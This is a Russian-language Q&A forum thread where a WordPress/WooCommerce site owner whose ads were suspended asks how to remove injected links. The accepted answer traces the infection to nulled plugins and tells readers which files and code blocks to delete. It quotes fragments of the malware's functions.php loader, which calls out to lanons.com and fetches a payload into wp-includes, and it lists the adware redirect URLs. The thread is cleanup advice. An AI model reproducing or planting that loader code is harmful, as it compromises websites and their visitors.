legoex
@legoex
Пытаюсь стать программистом.

Как удалить нежелательные ссылки с WordPress сайта?

Здравствуйте мой сайт
получил вот такое письмо от Adwords сайт на Wordpress+Woocommerce...
Все кампании приостановили...
Просканировал сайт всем чем только можно было ничего не обнаружено..
В файлах тоже искал эти ссылки ничего нет...
ЧТо делать кто сталкивался

НА вашем сайте обнаружены нежелательные ссылки
deloton.com/apu.php?zoneid=1459841
go.mobisla.com/notice.php?p=1459844&interactive=1&pushup=1
go.pub2srv.com/apu.php?zoneid=1459841
go.pushnative.com/notice.php?p=1459844&interactive=1&pushup=1
  • Вопрос задан
  • 2470 просмотров
Решения вопроса 1
@Cristalius
результат появления этих ссылок это установка плагинов или тем со сторонних ресурсов, я допустим цепанул отсюда www.freenulled.top и определил методом 3х часовых исследований и вычислений, в папке плагина лежат файлы class.plugin-modules.php или class.theme-modules.php, удаляй сразу их на хостинге (проверь на всем сайте эти файлы), в них как раз начальный код установки червя который все подцепляет с сайта lanons.com или zanons.com. прописывает записи в functions.php и создает файлы.

идешь functions.php шаблона и там в самом начале увидишь:
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

там далее.........

if ($ping) {
$content = @file_get_contents('www.lanons.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('www.lanons.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
и конец.....
//install_code_end ?>

удаляй весь этот код

Далее идешь wp-includes/ и в самом низу увидишь файлы
wp-tmp.php
wp-vcd.php
wp-feed.php
wp-cd.php
удаляй их тоже, они все связаны с вирусом, в них как раз увидишь твои конечные ссылки

А лучше скачай сайт весь на комп и через notepad++ через поиск в файлах указываешь папку скаченного сайта и вводишь: домены своих ссылок, он проверит все файлы на наличие записей, удаляй их
далее вводи lanons.com и по той же схеме удаляешь весь код.
еще проверь наличие записей wp-tmp и других файлов которые выше написал

Ну вроде все ))
Ответ написан
Пригласить эксперта
Ответы на вопрос 3
@Nardil
Инженер-программист
Может вирус на сайте? Который генерирует скриптом сторонние ссылки. Проверьте сайт сервисом АйБолит, если есть возможность.
Ответ написан
Комментировать
@solo__dj
Cristalius помогло.. осталось вычислить плагин занесший эту заразу... кстати https://aw-snap.info/file-viewer/ отличный сканер, без лишнего хлама
Ответ написан
Комментировать
@mirzok
Information Security
Просканировать на наличие вирусных файлов и нежелательных ссылок можешь с помощью https://metascan.ru. Он и по Wordpress выдаст уязвимости, если у тебя дыры есть в безопасности или устаревшие плагины с уязвимостями.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы